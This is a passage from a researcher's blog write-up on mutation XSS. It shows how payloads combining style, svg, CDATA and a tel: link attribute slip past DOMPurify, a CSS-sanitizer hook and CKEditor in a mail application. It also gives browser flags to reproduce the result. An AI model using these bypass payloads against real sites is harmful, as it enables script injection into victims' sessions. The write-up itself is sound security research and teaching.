<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;style id=jj&gt;&lt;a href='tel:&lt;/style&gt;shirley &lt;style&gt;&lt;![CDATA[h1 { color: red;&lt;/style&gt; &lt;img src=x onerror=alert()&gt; aaaaaaaaaaaaaaaaaaaaaaa  &lt;style&gt; }]]&gt; &lt;/style&gt;'&gt;"&gt;
</code></pre></div></div>

<p>This allowed me to get XSS in the local environment which I setup, upon testing the same vector in the Redacted Mail application it didn’t workkk the payload was breaking here and there. This meant my local setup is not exactly same as what’s on the target. I investigated further and concluded that they were doing something like this, I was dealing with minified js so it was hell to figure out exactly what they were doing.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">clean</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">dirty</span><span class="p">)</span>
<span class="nx">f</span> <span class="o">=</span> <span class="p">(</span><span class="k">new</span> <span class="nx">DOMParser</span><span class="p">).</span><span class="nf">parseFromString</span><span class="p">(</span><span class="nx">clean</span><span class="p">,</span> <span class="dl">"</span><span class="s2">text/html</span><span class="dl">"</span><span class="p">)</span>
<span class="nx">e</span> <span class="o">=</span> <span class="nx">f</span><span class="p">.</span><span class="nx">documentElement</span><span class="p">.</span><span class="nx">outerHTML</span>
</code></pre></div></div>

<p>I spent a few more days on fixing the payload but it was getting broken at one point or another there was something more going on behind the scenes as well. As nothing was working for me, I decided to re-shift my goal and asked myself can I smuggle the same CKEditor payload without using the nested DOMPurify bypass? I thought if I can find some mutation for the CDATA payload where DOMPurify sees it differently and considers it safe compared to CKEditor which has a different parsing rule compared to DOMPurify.</p>

<iframe style="width:100%; height:500px; border:1px solid #333; border-radius:8px;" sandbox="allow-scripts allow-modals allow-popups allow-same-origin" src="https://yeswehack.github.io/Dom-Explorer/frame?input=editable&amp;titleBar=readonly&amp;readonly=true&amp;pipe[titleBar]=true&amp;pipe[settings]=true&amp;pipe[render]=true&amp;pipe[skip]=true#eyJpbnB1dCI6InNoaXJsZXkgPHN0eWxlPiBhYWE8IDwvc3R5bGU+XG48c3R5bGUgaWQ9XCJyZW1vdmVkXCI+IDxhIDwvc3R5bGU+XG48c3R5bGUgaWQ9XCJyZW1vdmVkXCI+IDwxIDwvc3R5bGU+IiwicGlwZWxpbmVzIjpbeyJpZCI6IjVwam5hMXRvIiwibmFtZSI6IkRvbSBUcmVlIiwicGlwZXMiOlt7Im5hbWUiOiJEb21QdXJpZnkiLCJpZCI6IjhqcWJjaG5jIiwiaGlkZSI6ZmFsc2UsInNraXAiOmZhbHNlLCJvcHRzIjp7InZlcnNpb24iOiIzLjEuNSIsIm9wdGlvbnMiOiJ7fSIsImhvb2tzIjoiZnVuY3Rpb24oZG9tUHVyaWZ5KXsgXG4gIGRvbVB1cmlmeS5yZW1vdmVBbGxIb29rcygpXG4gIC8vIC4uLlxufSJ9fV19XX0="></iframe>

<p><img alt="image" src="/assets/images/mxss/11.png" /></p>

<p><br /></p>

<p>DOMPurify has the following code to deal around with this where upon detecting any possible starting tags or closing ones it would remove that element itself.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="kd">const</span> <span class="nx">_sanitizeElements</span> <span class="o">=</span> <span class="nf">function </span><span class="p">(</span><span class="nx">currentNode</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">let</span> <span class="nx">content</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
    <span class="p">...</span>
    <span class="p">...</span>

    <span class="cm">/* Detect mXSS attempts abusing namespace confusion */</span>
    <span class="k">if </span><span class="p">(</span>
      <span class="nx">currentNode</span><span class="p">.</span><span class="nf">hasChildNodes</span><span class="p">()</span> <span class="o">&amp;&amp;</span>
      <span class="o">!</span><span class="nf">_isNode</span><span class="p">(</span><span class="nx">currentNode</span><span class="p">.</span><span class="nx">firstElementChild</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
      <span class="nf">regExpTest</span><span class="p">(</span><span class="sr">/&lt;</span><span class="se">[/\w]</span><span class="sr">/g</span><span class="p">,</span> <span class="nx">currentNode</span><span class="p">.</span><span class="nx">innerHTML</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
      <span class="nf">regExpTest</span><span class="p">(</span><span class="sr">/&lt;</span><span class="se">[/\w]</span><span class="sr">/g</span><span class="p">,</span> <span class="nx">currentNode</span><span class="p">.</span><span class="nx">textContent</span><span class="p">)</span>
    <span class="p">)</span> <span class="p">{</span>
      <span class="nf">_forceRemove</span><span class="p">(</span><span class="nx">currentNode</span><span class="p">);</span>
      <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>But worry not again luck is on our side, <code class="language-plaintext highlighter-rouge">&lt;![CDATA[</code> the starting block of CDATA gets passed through this regex test easily without triggering any alarms.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">shirley</span> <span class="o">&lt;</span><span class="nx">style</span><span class="o">&gt;</span> <span class="o">&lt;!</span><span class="p">[</span><span class="nx">CDATA</span><span class="p">[</span> <span class="o">&lt;</span><span class="sr">/style</span><span class="err">&gt;
</span></code></pre></div></div>

<p>The same works locally but in the target you can see the difference, in the first iteration itself the content inside of STYLE element is removed.</p>

<p><img alt="image" src="/assets/images/mxss/12.png" /></p>

<p><br /></p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">dirty</span>
<span class="dl">"</span><span class="s2">shirley &lt;style&gt; &lt;![CDATA[ &lt;/style&gt;</span><span class="dl">"</span>
<span class="nx">serializedHTML</span>
<span class="dl">"</span><span class="s2">shirley &lt;style&gt;&lt;/style&gt;</span><span class="dl">"</span> 
</code></pre></div></div>

<p>The culprit for this was the <code class="language-plaintext highlighter-rouge">uponSanitizeElement</code> hook method, which inside uses a CSS sanitizer to ensure users can’t include any sort of arbitrary CSS in mails.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="nx">domPurify</span><span class="p">.</span><span class="nf">addHook</span><span class="p">(</span><span class="dl">"</span><span class="s2">uponSanitizeElement</span><span class="dl">"</span><span class="p">,</span> <span class="k">this</span><span class="p">.</span><span class="nx">handleElement</span><span class="p">.</span><span class="nf">bind</span><span class="p">(</span><span class="k">this</span><span class="p">)),</span>

  <span class="nx">Sanitizer</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">handleElement</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">element</span><span class="p">,</span> <span class="nx">_data</span><span class="p">)</span> <span class="p">{</span>
      <span class="nx">element</span> <span class="k">instanceof</span> <span class="nx">HTMLStyleElement</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">element</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">cssSanitizer</span><span class="p">.</span><span class="nf">sanitizeStyleElement</span><span class="p">(</span><span class="nx">element</span><span class="p">))</span>
  <span class="p">}</span>

</code></pre></div></div>

<p>The CSS sanitizer is a full blown CSS parser which goes through all the css rules and their respective values. Bypassing this was very easy, I just needed to include the payload inside of a css rule value. This goes as it is through DOMPurify.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>shirley <span class="nt">&lt;style&gt;</span> <span class="nc">.test</span> <span class="p">{</span> <span class="nl">font-family</span><span class="p">:</span> <span class="err">"</span><span class="n">Times</span> <span class="n">New</span> <span class="n">Roman</span> <span class="err">&lt;!</span><span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="err">"</span><span class="p">}</span><span class="nt">&lt;/style&gt;</span>
</code></pre></div></div>

<p>Coming back to the original payload for CKEditor</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;style&gt;</span><span class="o">&lt;![</span><span class="nt">CDATA</span><span class="o">[</span><span class="nt">h1</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span><span class="nt">&lt;/style&gt;</span> // [1]
<span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span> aaaaaaaaaaaaaaaaaaaaaaa // [2]
<span class="nt">&lt;style&gt;</span> <span class="err">}</span><span class="o">]]&gt;</span> <span class="nt">&lt;/style&gt;</span> // [3]
</code></pre></div></div>

<p>For [1] I can use <code class="language-plaintext highlighter-rouge">&lt;style&gt; .test { font-family: "Times New Roman &lt;![CDATA["}&lt;/style&gt;</code>
For [3] the css sanitizer will convert it to <code class="language-plaintext highlighter-rouge">&lt;style&gt;&lt;/style&gt;</code>
For [2] DOMPurify parser will easily see the image onerror vector it would be sanitized to <code class="language-plaintext highlighter-rouge">&lt;img src=x&gt;</code></p>

<p>Remember that DOMPurify doesn’t allow you to include any tags inside of it (regex check) so the only possible way for me to hide my payload [2] would be inside an attribute value otherwise it will always be sanitized and same for the <code class="language-plaintext highlighter-rouge">&lt;/style&gt;</code> I can’t include it anywhere else the only possible place where I can put an extra closing style tag is inside the attribute value that too only because of the hooks forceKeepAttr misconfiguration.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"tel:&lt;/style&gt;&lt;img src=x onerror=alert()&gt;"</span><span class="nt">&gt;</span>
</code></pre></div></div>

<p>This was the payload I came up with to bypass both DOMPurify and CKEditor, the payload appears safe so DOMPurify lets it pass but when parsed by CKEditor it’s a different story</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>shirley<span class="nt">&lt;style&gt;</span><span class="o">&lt;![</span><span class="nt">CDATA</span><span class="o">[</span><span class="nt">h1</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span><span class="nt">&lt;/style&gt;</span>  <span class="nt">&lt;svg&gt;&lt;style&gt;</span><span class="o">&lt;</span><span class="nt">a</span> <span class="nt">href</span><span class="o">=</span><span class="err">"</span><span class="nt">tel</span><span class="o">:</span><span class="nt">&lt;/style&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span>"&gt;<span class="nt">&lt;/style&gt;&lt;/svg&gt;</span> <span class="nt">&lt;svg&gt;&lt;style&gt;</span><span class="err">}</span><span class="o">]]&gt;</span><span class="nt">&lt;/style&gt;&lt;/svg&gt;</span>
</code></pre></div></div>

<p>DOMPurify sees</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>shirley
<span class="nt">&lt;style&gt;</span><span class="o">&lt;![</span><span class="nt">CDATA</span><span class="o">[</span><span class="nt">h1</span> <span class="p">{</span> <span class="nl">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span><span class="nt">&lt;/style&gt;</span>
<span class="nt">&lt;svg&gt;</span>
  <span class="nt">&lt;style&gt;</span>
    <span class="o">&lt;</span><span class="nt">a</span> <span class="nt">href</span><span class="o">=</span><span class="err">"</span><span class="nt">tel</span><span class="o">:</span><span class="nt">&lt;/style&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span>"&gt;
  <span class="nt">&lt;/style&gt;</span>
<span class="nt">&lt;/svg&gt;</span> 
<span class="nt">&lt;svg&gt;</span>
 <span class="nt">&lt;style&gt;</span>
   <span class="err">}</span><span class="o">]]&gt;</span>
 <span class="nt">&lt;/style&gt;</span>
<span class="nt">&lt;/svg&gt;</span>
</code></pre></div></div>

<p>And this is how it gets parsed and rendered by CKEditor</p>

<p><img alt="image" src="/assets/images/mxss/13.png" /></p>

<p><br /></p>

<p>Finally some tweaks were needed to make it work on the real target and in the end this is how it looked like</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaaa<span class="nt">&lt;style&gt;</span> <span class="nc">.custom-text</span><span class="nd">::before</span> <span class="p">{</span> <span class="nl">font-family</span><span class="p">:</span> <span class="err">"</span><span class="n">Times</span> <span class="n">New</span> <span class="n">Roman</span> <span class="err">&lt;!</span><span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="n">h1</span> <span class="err">{</span> <span class="n">color</span><span class="p">:</span> <span class="no">red</span><span class="p">;</span> <span class="err">",</span> <span class="err">serif;</span> <span class="p">}</span><span class="nt">&lt;/style&gt;&lt;svg&gt;&lt;style&gt;</span><span class="o">&lt;</span><span class="nt">a</span> <span class="nt">href</span><span class="o">=</span><span class="err">"</span><span class="nt">tel</span><span class="o">:</span><span class="nt">&lt;/style&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span>aaaaaaaaaaaaa"&gt;<span class="nt">&lt;/style&gt;&lt;/svg&gt;</span> <span class="nt">&lt;svg&gt;&lt;style&gt;</span><span class="err">}</span><span class="o">]]&gt;</span> <span class="nt">&lt;/style&gt;</span> <span class="nt">&lt;/svg&gt;</span>
</code></pre></div></div>

<hr />

<p>When the DOMPurify bypasses came out, mxss was something which I was really scared of and couldn’t really wrap my head around it. If you call yourself a client side lover, MXSS is something which you should have a good grasp on so I had no other choice but to get good at it.</p>

<p>I spent way too long on DOMPurify in order to reverse engineer the poc, iirc the DOMPurify bypasses were only disclosed publicly after a year the advisory came out. I still remember I used to debug DOMPurify source line by line just to understand how it works, reading RFCs, reading all previous mxss related findings and trying to find those on your own just to get a feel for how they were discovered in the first place.</p>

<p>If I hadn’t spent that time on mxss I would have never found this xss bug in the mail application. Mxss payloads aren’t something which you can build blindly unless you know what you are doing you need understanding of the basics how html is parsed and serialized everything from the ground up.</p>

<p>I will also share some resources if you are interested in learning about MXSS.</p>

<p>This is absolute the best content out there for anyone who wants to get started with XSS, <a href="https://x.com/SecurityMB">Michał Bentkowski</a> explains things so well I watched this video like 2-3 times</p>

<iframe width="100%" height="450" style="max-width:800px;" src="https://www.youtube.com/embed/QBkLI35sxVs?si=b78BW0Sr2fxsKTEg" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen=""></iframe>

<p><br /></p>

<p>This video from LiveOverflow still gives me goosebumps</p>

<iframe width="100%" height="450" style="max-width:800px;" src="https://www.youtube.com/embed/lG7U3fuNw3A?si=yst2AoFYR2K8_bLB" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen=""></iframe>

<p><br /></p>

<p>I got my final hint for the DOMPurify bypass by watching S1r1us’s video only otherwise I don’t think I would have been able to come up with the poc in time before the public disclosures were made.</p>

<iframe width="100%" height="450" style="max-width:800px;" src="https://www.youtube.com/embed/vVwo5tW6d3w?si=MVd2qnLV8juXXwUr" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen=""></iframe>

<p><br /></p>

<p>Before wrapping up this blogpost, mxss is cool right? But guess what the above payloads you saw wouldn’t actually work now, due to a spec change which was adopted by all major browsers.</p>

<p>This spec was pushed by none other than SecurityMB, the same person who once started all this by finding those DOMPurify bypasses in the early era put a nail in the coffin :p</p>

<p><a href="https://github.com/whatwg/html/issues/6235">https://github.com/whatwg/html/issues/6235</a></p>

<p>If you want to test the payloads yourself, they should work on the latest version of Firefox and Chromium. Due to the above spec changes, the <code class="language-plaintext highlighter-rouge">--disable-features=EscapeLtGtInAttributes</code> startup flag is required for Chrome, and in Firefox set <code class="language-plaintext highlighter-rouge">dom.security.html_serialization_escape_lt_gt=false</code> in <code class="language-plaintext highlighter-rouge">about:config</code> (this check should say “does NOT escape”) and you should be good to go.</p>

  </div><a class="u-url" href="/2026/04/07/mxss.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
        <p class="feed-subscribe">
          <a href="http://localhost:4000/feed.xml">
            <svg class="svg-icon orange">
              <use xlink:href="/assets/minima-social-icons.svg#rss"></use>
            </svg><span>Subscribe</span>
          </a>
        </p>
        <ul class="contact-list">
          <li class="p-name">sudi</li>
          <li><a class="u-email" href="mailto:sudi[at]wearehackerone.com">sudi[at]wearehackerone.com</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <p>Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description.
</p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"></ul>
</div>

  </div>

</footer>
</body>

</html>
